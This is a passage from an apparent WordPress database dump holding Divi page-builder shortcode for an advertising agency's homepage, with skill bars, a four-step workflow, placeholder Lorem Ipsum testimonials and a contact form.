animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\" hover_enabled=\"0\"]<p>We have a dedicated inhouse talent to handle the various aspects of communication and digital advertising. Be it creative writing or eye catching graphic design. Our young and energetic team bring best and creative execution to all the ideas created.</p>\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\" hover_enabled=\"0\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"4.5.2\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" hover_enabled=\"0\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]\n\nLead/Sales Generation Campaign - 77%\n\n[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"4.5.2\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" hover_enabled=\"0\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]\n\nDigital Advertising - 85%\n\n[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\" hover_enabled=\"0\" alt=\"creative services\" title_text=\"creative services\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12-1.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\" alt=\"Best Advertising agency\" title_text=\"best-advertising-agency\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\" hover_enabled=\"0\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\"]<h2><span>Easy to start</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>\n[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" saved_specialty_column_type=\"1_2\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" saved_specialty_column_type=\"1_2\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" saved_specialty_column_type=\"1_2\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" saved_specialty_column_type=\"1_2\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5-1.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"digital marketing agency\" title_text=\"digital-marketing-agency\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\" hover_enabled=\"0\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" hover_enabled=\"0\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home New','','inherit','closed','closed','','564-revision-v1','','','2020-08-07 20:29:28','2020-08-07 20:29:28','',564,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/564-revision-v1/',0,'revision','',0),(627,1,'2020-08-07 20:29:56','2020-08-07 20:29:56','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px|\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\" alt=\"Main Banner WhatTheHell?\" title_text=\"main banner \"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" global_module=\"569\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>\n[/et_pb_text][et_pb_button button_text=\"Learn More\" _builder_version=\"4.5.2\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"fade\" hover_enabled=\"0\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_alignment=\"center\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" 